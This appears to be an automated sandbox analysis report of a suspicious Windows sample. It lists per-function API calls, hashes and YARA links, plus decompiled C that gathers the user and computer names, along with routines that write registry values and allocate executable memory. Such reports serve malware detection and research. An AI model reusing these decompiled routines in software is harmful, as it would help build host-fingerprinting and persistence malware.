MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00B6D4D4
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 00B6D4F5
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 00B6D4FD

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: b6097b339b42240370cb9edd2513ae2b6703eb6e4bfbfb5cb9c3d63d75b6f4d0
Instruction ID: 55c10608d6c655a051ad1a1686dd9e019b3cb651ffbb53ae1d1105debe87f067
Opcode Fuzzy Hash: b6097b339b42240370cb9edd2513ae2b6703eb6e4bfbfb5cb9c3d63d75b6f4d0
Instruction Fuzzy Hash: 7D21A572B40204BBD7219B68DC45F9E37EDEB84750F2140A5F61AE72E0DF70AA45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B5F363, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 148timestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B704F0: InterlockedIncrement.KERNEL32(76929BD8), ref: 00B70541
Part of subcall function 00B704F0: RtlLeaveCriticalSection.NTDLL(00000000), ref: 00B705CC

OpenProcess.KERNEL32(00000410,1D1D1D1D,00B77DD4,76929BC0,00000000,00B77DD4,0000001C,00000000,00000000,?,?,?,00B77DD4), ref: 00B5F3BD
CloseHandle.KERNEL32(00000000,00000000,00000000,00B77DE4,00000104,?,?,?,00B77DD4), ref: 00B5F3DB
GetSystemTimeAsFileTime.KERNEL32(00B77DD4), ref: 00B5F443
lstrlenW.KERNEL32(B7B0D815), ref: 00B5F4B8
GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 00B5F4D4
memcpy.NTDLL(00000014,B7B0D815,00000002), ref: 00B5F4EC

Part of subcall function 00B77E77: RtlLeaveCriticalSection.NTDLL(?), ref: 00B77EF4

Strings

o, xrefs: 00B5F4A9

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
String ID: o
API String ID: 2541713525-252678980
Opcode ID: e2cbb4fbe4920232e0e197e9d403b1a4b48a1af74fbcb590d495ecd3329bba41
Instruction ID: 17cebbcd3c58a48c409061f2737755df607d4ddd90e41fe90716aaab225e1b2a
Opcode Fuzzy Hash: e2cbb4fbe4920232e0e197e9d403b1a4b48a1af74fbcb590d495ecd3329bba41
Instruction Fuzzy Hash: 18518C71640706ABD720DF64D888FBBB7E8FF04306F1045A9EA45D7660EB70E989CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00B742A9, Relevance: 12.1, APIs: 8, Instructions: 123memoryregistrysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00B5B8B7: RegCreateKeyA.ADVAPI32(80000001,0434B7F0,?), ref: 00B5B8CC
Part of subcall function 00B5B8B7: lstrlen.KERNEL32(0434B7F0,00000000,00000000,00000000,?,?,?,00B54C3E,00000000,?,7673D3B0,74E05520,?,?,?,00B51F86), ref: 00B5B8F5

RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 00B742EE
RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00B74306
HeapFree.KERNEL32(00000000,74E5F5B0,?,?,00000000,00B5B109,00000000,74E5F5B0,00B6683A), ref: 00B74368
RtlAllocateHeap.NTDLL(00000000,00B6683A), ref: 00B7437C
WaitForSingleObject.KERNEL32(00000000,?,?,00000000,00B5B109,00000000,74E5F5B0,00B6683A), ref: 00B743CE
HeapFree.KERNEL32(00000000,74E5F5B0,?,?,00000000,00B5B109,00000000,74E5F5B0,00B6683A), ref: 00B743F7
HeapFree.KERNEL32(00000000,?,?,?,00000000,00B5B109,00000000,74E5F5B0,00B6683A), ref: 00B74407
RegCloseKey.ADVAPI32(?,?,?,00000000,00B5B109,00000000,74E5F5B0,00B6683A), ref: 00B74410

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
String ID:
API String ID: 3503961013-0
Opcode ID: 0486222df4bc09ae766ea8334fa5098e27a626da8134909abee699a7ed07208f
Instruction ID: ea0c1d898a93623911d535753fd4d1c65ce50e5a924a803efc375feb63fc7c0a
Opcode Fuzzy Hash: 0486222df4bc09ae766ea8334fa5098e27a626da8134909abee699a7ed07208f
Instruction Fuzzy Hash: 3441C8B5C01219EFDF119F94DD848EEBBB9FB08305F1084AAE529A2220D7354E95DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00B5B2BF, Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00B5ACC7), ref: 00B5B2D5
wsprintfA.USER32 ref: 00B5B2FD
lstrlen.KERNEL32(?), ref: 00B5B30C

Part of subcall function 00B70757: RtlFreeHeap.NTDLL(00000000,00000000,00B629D3,00000000), ref: 00B70763

wsprintfA.USER32 ref: 00B5B34C
wsprintfA.USER32 ref: 00B5B381
memcpy.NTDLL(00000000,?,?), ref: 00B5B38E
memcpy.NTDLL(00000008,00B7B3F8,00000002,00000000,?,?), ref: 00B5B3A3
wsprintfA.USER32 ref: 00B5B3C6

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
String ID:
API String ID: 2937943280-0
Opcode ID: 82029f3f09c8d7af65bf897e028927a9ca755330ff0036116f0d1212b6759a2c
Instruction ID: 07b7f93091569bc3415e1186f3d4ba95aea174af35ef60b8e600401d38e96deb
Opcode Fuzzy Hash: 82029f3f09c8d7af65bf897e028927a9ca755330ff0036116f0d1212b6759a2c
Instruction Fuzzy Hash: 47410D75900109EFDB10DF98DC85EAAB7FCEF44309B154495F919E7221EB30EA15CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00B559C8, Relevance: 12.1, APIs: 8, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 00B559F2
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B55A05
GetUserNameW.ADVAPI32(00000000,?), ref: 00B55A17
HeapFree.KERNEL32(00000000,?), ref: 00B55A3B
GetComputerNameW.KERNEL32(00000000,?), ref: 00B55A49
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B55A60
GetComputerNameW.KERNEL32(00000000,?), ref: 00B55A71
HeapFree.KERNEL32(00000000,00000000), ref: 00B55A97

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 92e857a9095472ad68ec6b4023e4b6ddb97e10750e996a56c73da971e83ad2a8
Instruction ID: 7ec070154592e1ed2f8a399eac9fd40c2f6f862e9074196f4b0791a2d9662a9c
Opcode Fuzzy Hash: 92e857a9095472ad68ec6b4023e4b6ddb97e10750e996a56c73da971e83ad2a8
Instruction Fuzzy Hash: C631EBB6900209EFDB10DFA4DD859AFBBFEEB4420571085A9E915D3220DB309E859F10

Uniqueness

Uniqueness Score: -1.00%

Function 00B56A9F, Relevance: 12.1, APIs: 8, Instructions: 57registrymemorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00B6B262,00000000,00000000,00B814A0,?,?,00B5FDD2,00B6B262,00000000,00B6B262,00B81480), ref: 00B56AB2
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 00B56AC0
wsprintfA.USER32 ref: 00B56ADC
RegCreateKeyA.ADVAPI32(80000001,00B81480,00000000), ref: 00B56AF4
lstrlen.KERNEL32(?), ref: 00B56B03
RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 00B56B11
RegCloseKey.ADVAPI32(?), ref: 00B56B1C
HeapFree.KERNEL32(00000000,00000000), ref: 00B56B2B

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
String ID:
API String ID: 1575615994-0
Opcode ID: 0fca6e6d0d9cdce9e21d59fcbc0bbc43ebd18c847c2f9ad36e2b2868616facfe
Instruction ID: a15b2acee9c517547ddbc5919207fddf25eb787906f154bdb02171e4a425b4b1
Opcode Fuzzy Hash: 0fca6e6d0d9cdce9e21d59fcbc0bbc43ebd18c847c2f9ad36e2b2868616facfe
Instruction Fuzzy Hash: BF118736200108BFEB016B98EC89FAA3BBEEB48344F008061FA04D3170DF729D59DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B53B36, Relevance: 11.5, APIs: 9, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 63d7a73c05b8810fdee646d24a96b7cb05bf5961ea25904f1f7e3e743015820d
Instruction ID: 77916c0365ef715af912ac30f186e863a2712f0ac03f0ca23d3ac1ab83330156
Opcode Fuzzy Hash: 63d7a73c05b8810fdee646d24a96b7cb05bf5961ea25904f1f7e3e743015820d
Instruction Fuzzy Hash: 8AA1E571D00209EFDF22ABA4CC45BEEBBF5EF04786F1044A5E921A6260D7719E99DF10

Uniqueness

Uniqueness Score: -1.00%

Function 00B52717, Relevance: 10.7, APIs: 7, Instructions: 165stringmemoryCOMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32(00B7D5D0,00000038,00B5B052,00000000,74E5F5B0,00B6683A,?,?,?,?,?,?,?,00B577C7,?), ref: 00B52728
StrChrA.SHLWAPI(00000000,00000020,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B52739

Part of subcall function 00B51BC9: lstrlen.KERNEL32(?,00000000,74E06980,00000000,00B6C55F,?), ref: 00B51BD2
Part of subcall function 00B51BC9: memcpy.NTDLL(00000000,?,00000000,?), ref: 00B51BF5
Part of subcall function 00B51BC9: memset.NTDLL ref: 00B51C04

ExitProcess.KERNEL32 ref: 00B5291B

Part of subcall function 00B755C4: StrChrA.SHLWAPI(?,?,7673D3B0,0434C0D4,00000000,?,00B641F5,?,00000020,0434C0D4), ref: 00B755E9
Part of subcall function 00B755C4: StrTrimA.SHLWAPI(?,00B7D49C,00000000,?,00B641F5,?,00000020,0434C0D4), ref: 00B75608
Part of subcall function 00B755C4: StrChrA.SHLWAPI(?,?,?,00B641F5,?,00000020,0434C0D4), ref: 00B75614

lstrcmp.KERNEL32(?,?), ref: 00B527A7
VirtualAlloc.KERNEL32(00000000,0000FFFF,00001000,00000040,?,?,?,?,?,?,?,00B577C7,?), ref: 00B527BF

Part of subcall function 00B6B986: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,0434B7F0,?,?,00B5B905,0000003A,0434B7F0,?,?,?,00B54C3E,00000000,?), ref: 00B6B9C6
Part of subcall function 00B6B986: CloseHandle.KERNEL32(000000FF,?,?,00B5B905,0000003A,0434B7F0,?,?,?,00B54C3E,00000000,?,7673D3B0,74E05520), ref: 00B6B9D1

VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,?,?,?,?,?,?,00B577C7,?), ref: 00B52831
lstrcmp.KERNEL32(?,?), ref: 00B5284A

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Virtuallstrcmp$AllocCloseCommandErrorExitFreeHandleLastLineProcessTrimlstrlenmemcpymemset
String ID:
API String ID: 739714153-0
Opcode ID: fcda66fef62a0d1c47ba0d4061033702872058c7e4f1f8009f50cdafc7846edd
Instruction ID: 06aceb7a13830b016de641b76c72dcc4b48aa1aeb9518b6992a951b74fed4eaf
Opcode Fuzzy Hash: fcda66fef62a0d1c47ba0d4061033702872058c7e4f1f8009f50cdafc7846edd
Instruction Fuzzy Hash: 00517871901218ABDB11ABE4CC89FEEBBF8EF09702F1044A5F915F6260DB349949CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00B54F5A, Relevance: 10.6, APIs: 7, Instructions: 124threadstringCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B54F9B
GetWindowThreadProcessId.USER32(00000000,?), ref: 00B54FC9
GetWindowThreadProcessId.USER32(?,?), ref: 00B5500E
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B55036
_strupr.NTDLL ref: 00B55061
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 00B5506E
CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 00B55088

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
String ID:
API String ID: 3831658075-0
Opcode ID: e62735f2cc410775c864d237530ce006c7678d1ba943878207975a4864caea50
Instruction ID: e624d89f5316c1c0388deed1a5d09bd949d73bcb8b8879d0f841b2586d0a3192
Opcode Fuzzy Hash: e62735f2cc410775c864d237530ce006c7678d1ba943878207975a4864caea50
Instruction Fuzzy Hash: 5E412031900218EFDF219FA4CC45BEEBBB5EF48702F144496EA14A21A0DB749A84CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B71D92, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00B66072,00000000), ref: 00B71DAC
RtlAllocateHeap.NTDLL(00000000,00000024), ref: 00B71DC1
memset.NTDLL ref: 00B71DCE
HeapFree.KERNEL32(00000000,00000000,?,00B66071,?,?,00000000,?,00000000,00B59E0F,?,00000000), ref: 00B71DEB
memcpy.NTDLL(?,?,00B66071,?,00B66071,?,?,00000000,?,00000000,00B59E0F,?,00000000), ref: 00B71E0C

Strings

chun, xrefs: 00B71E88

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Heap$Allocate$Freememcpymemset
String ID: chun
API String ID: 2362494589-3058818181
Opcode ID: 91a64cb41b1288a053ab76f9f25dadee8ae9d9d2b472cfb900cff7647069a696
Instruction ID: a40f64600a521576e2b0d74219186ac6e27980be8c3ee2e56125da5053cbd336
Opcode Fuzzy Hash: 91a64cb41b1288a053ab76f9f25dadee8ae9d9d2b472cfb900cff7647069a696
Instruction Fuzzy Hash: B0319A31100701AFD720DF5DCC44B66BBEDEF09310F0089AAE95A8B270DB30E946CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B55F09, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91memoryfilestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B6E55D: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00B77545,00002334,?,?,?,?,00B512DF,?), ref: 00B6E56F
Part of subcall function 00B6E55D: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00B77545,00002334,?,?,?,?,00B512DF), ref: 00B6E588
Part of subcall function 00B6E55D: GetCurrentThreadId.KERNEL32 ref: 00B6E595
Part of subcall function 00B6E55D: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,00B77545,00002334,?,?,?,?,00B512DF,?), ref: 00B6E5A1
Part of subcall function 00B6E55D: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,00B77545,00002334), ref: 00B6E5AF
Part of subcall function 00B6E55D: lstrcpy.KERNEL32(00000000), ref: 00B6E5D1

lstrlen.KERNEL32(00000000,?,00000F00), ref: 00B55F2D

Part of subcall function 00B57AB7: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,00B7756B,?,00000000,?,00002334), ref: 00B57AC8
Part of subcall function 00B57AB7: lstrlen.KERNEL32(?,?,?,?,?,?,00B7756B,?,00000000,?,00002334,?,?,?,?,00B512DF), ref: 00B57ACF
Part of subcall function 00B57AB7: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 00B57AE1
Part of subcall function 00B57AB7: _snprintf.NTDLL ref: 00B57B07
Part of subcall function 00B57AB7: _snprintf.NTDLL ref: 00B57B3B
Part of subcall function 00B57AB7: HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 00B57B58

StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,000000FF,?,00000F00), ref: 00B55FC7
HeapFree.KERNEL32(00000000,?,000000FF,?,00000F00), ref: 00B55FE4
DeleteFileA.KERNEL32(00000000,00000000,?,?,?,00000000,000000FF,?,00000F00), ref: 00B55FEC
HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF,?,00000F00), ref: 00B55FFB

Strings

s:, xrefs: 00B55FBD

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
String ID: s:
API String ID: 2960378068-2363032815
Opcode ID: 497bce56567d7fdd8cdb2f0db6c9efabb97f5bd71ab36a76289cd6515e6aff12
Instruction ID: 6ed6d95a128814597c586de3c0711a62d08df5e537fdc884665435129dcb8779
Opcode Fuzzy Hash: 497bce56567d7fdd8cdb2f0db6c9efabb97f5bd71ab36a76289cd6515e6aff12
Instruction Fuzzy Hash: ED311C72A00205AFDB20ABE9CC85F9E7BFCEB19311F040595F619E3161EB74AA45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B0137A, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B0137A() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E00B075F6(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E00B04AAB(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0xb04565
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x00b01388
0x00b0138b
0x00b0138e
0x00b01394
0x00b01399
0x00b0139f
0x00b013a7
0x00b013aa
0x00b013b0
0x00b013b5
0x00b013c2
0x00b013cf
0x00b013d3
0x00b013d5
0x00b013d9
0x00b013dc
0x00b013ec
0x00b0143f
0x00b01440
0x00b013ee
0x00b013f3
0x00b013f4
0x00b013f9
0x00b013fc
0x00b0140f
0x00000000
0x00b01411
0x00b01414
0x00b01419
0x00b01427
0x00b0142a
0x00b01430
0x00b01435
0x00000000
0x00b01437
0x00b01437
0x00b0143a
0x00b0143a
0x00b01435
0x00b0140f
0x00b01445
0x00b01446
0x00b013b5
0x00b0144c

APIs

GetUserNameW.ADVAPI32(00000000,00B04563), ref: 00B0138E
GetComputerNameW.KERNEL32(00000000,00B04563), ref: 00B013AA

Part of subcall function 00B075F6: RtlAllocateHeap.NTDLL(00000000,00000000,00B04F70), ref: 00B07602

GetUserNameW.ADVAPI32(00000000,00B04563), ref: 00B013E4
GetComputerNameW.KERNEL32(00B04563,?), ref: 00B01407
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00B04563,00000000,00B04565,00000000,00000000,?,?,00B04563), ref: 00B0142A

Strings

@ht, xrefs: 00B0142A

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID: @ht
API String ID: 3850880919-1371871952
Opcode ID: 5e862c4ef34968f2a76a8c968f9b4aab772a6af93a77e469ed10c9c4ba9c551c
Instruction ID: 8599bb7f824df4a7d532ec70acb8090a4337cc8ea979c917d43aaf4e2b65dd60
Opcode Fuzzy Hash: 5e862c4ef34968f2a76a8c968f9b4aab772a6af93a77e469ed10c9c4ba9c551c
Instruction Fuzzy Hash: 5721F776900208FFDB11DFE8C984DEEBBB9EF44300B5044AAE501E7250EB30AB45DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00B6F7CD, Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00B5FDC3,00000000,00B81480,00B814A0,?,?,00B5FDC3,00B6B262,00B81480), ref: 00B6F7DD
RtlAllocateHeap.NTDLL(00000000,00000002), ref: 00B6F7F3
lstrlen.KERNEL32(00B6B262,?,?,00B5FDC3,00B6B262,00B81480), ref: 00B6F7FB
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B6F807
lstrcpy.KERNEL32(00B81480,00B5FDC3), ref: 00B6F81D
HeapFree.KERNEL32(00000000,00000000,?,?,00B5FDC3,00B6B262,00B81480), ref: 00B6F871
HeapFree.KERNEL32(00000000,00B81480,?,?,00B5FDC3,00B6B262,00B81480), ref: 00B6F880

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Heap$AllocateFreelstrlen$lstrcpy
String ID:
API String ID: 1531811622-0
Opcode ID: e7778d42ee2041f23c86fa5108cf374555346311c527b25bb2026ac447376a83
Instruction ID: 7d53847f56e4a6e027cf538517f3f411ebb75347ac2fe6805003c66d28c573b6
Opcode Fuzzy Hash: e7778d42ee2041f23c86fa5108cf374555346311c527b25bb2026ac447376a83
Instruction Fuzzy Hash: 0B210435100245EFEB224F68EC44F7A7FAAEB46340F1440E9E89957231CB359C86DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B6CBE2, Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B6E55D: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00B77545,00002334,?,?,?,?,00B512DF,?), ref: 00B6E56F
Part of subcall function 00B6E55D: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00B77545,00002334,?,?,?,?,00B512DF), ref: 00B6E588
Part of subcall function 00B6E55D: GetCurrentThreadId.KERNEL32 ref: 00B6E595
Part of subcall function 00B6E55D: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,00B77545,00002334,?,?,?,?,00B512DF,?), ref: 00B6E5A1
Part of subcall function 00B6E55D: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,00B77545,00002334), ref: 00B6E5AF
Part of subcall function 00B6E55D: lstrcpy.KERNEL32(00000000), ref: 00B6E5D1

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,?,00000000,?,?,00B512F0,00000000), ref: 00B6CC23
HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,?,00000000,?,?,00B512F0,00000000,?,00000006,?), ref: 00B6CC96

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
String ID:
API String ID: 2078930461-0
Opcode ID: cba839ee6752608842ee5a6647b67690d455184eaea917a2bf8942c524557a80
Instruction ID: f26ee2a8a08eaccebd123e090494b7c28ed9e80eef131fbfba15eda810fd6c8e
Opcode Fuzzy Hash: cba839ee6752608842ee5a6647b67690d455184eaea917a2bf8942c524557a80
Instruction Fuzzy Hash: 8611EF31141314BBD3312B20AC8DF6F3EADEB06764F004626F65A961B1DF668885CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00B01974, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00B01974(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xb0d2e0; // 0xdca5a8
				_t1 = _t9 + 0xb0e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E00B043A8(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E00B075F6(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E00B05601(_t34, _t41, _a8);
						E00B04AAB(_t41);
						_t42 = E00B0756E(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00B04AAB(_t36);
							_t36 = _t42;
						}
						_t43 = E00B026DD(_t36, _t33);
						if(_t43 != 0) {
							E00B04AAB(_t36);
							_t36 = _t43;
						}
					}
					E00B04AAB(_t28);
				}
				return _t36;
			}

0x00b01974
0x00b01977
0x00b01978
0x00b01980
0x00b01987
0x00b0198e
0x00b01992
0x00b01998
0x00b0199f
0x00b019a4
0x00b019b6
0x00b019ba
0x00b019be
0x00b019c4
0x00b019c9
0x00b019d9
0x00b019db
0x00b019f2
0x00b019f6
0x00b019f9
0x00b019fe
0x00b019fe
0x00b01a07
0x00b01a0b
0x00b01a0e
0x00b01a13
0x00b01a13
0x00b01a0b
0x00b01a16
0x00b01a16
0x00b01a21

APIs

Part of subcall function 00B043A8: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,00B0198E,253D7325,00000000,00000000,7691C740,?,?,00B04653,?), ref: 00B0440F
Part of subcall function 00B043A8: sprintf.NTDLL ref: 00B04430

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,00B04653,?,018D95B0), ref: 00B0199F
lstrlen.KERNEL32(?,?,?,00B04653,?,018D95B0), ref: 00B019A7

Part of subcall function 00B075F6: RtlAllocateHeap.NTDLL(00000000,00000000,00B04F70), ref: 00B07602

strcpy.NTDLL ref: 00B019BE
lstrcat.KERNEL32(00000000,?), ref: 00B019C9

Part of subcall function 00B05601: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00B019D8,00000000,?,?,?,00B04653,?,018D95B0), ref: 00B05618

Part of subcall function 00B04AAB: RtlFreeHeap.NTDLL(00000000,00000000,00B05012,00000000,?,?,00000000), ref: 00B04AB7

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00B04653,?,018D95B0), ref: 00B019E6

Part of subcall function 00B0756E: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00B019F2,00000000,?,?,00B04653,?,018D95B0), ref: 00B07578
Part of subcall function 00B0756E: _snprintf.NTDLL ref: 00B075D6

Strings

=, xrefs: 00B019E0

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 4cde5f5dc2e888e22d82d7725d4d37bddda2429ebc5e0445af1a55250fff1578
Instruction ID: 1db7ae9db84eb4ad497075cc67c9d435e2b1112bdfdd4e2f1a8789b4b7a653c5
Opcode Fuzzy Hash: 4cde5f5dc2e888e22d82d7725d4d37bddda2429ebc5e0445af1a55250fff1578
Instruction Fuzzy Hash: EB11C273A016286BC612BBB89C89C6F3FEDDE8576030545D5FA05AB282DF34DD0687A4

Uniqueness

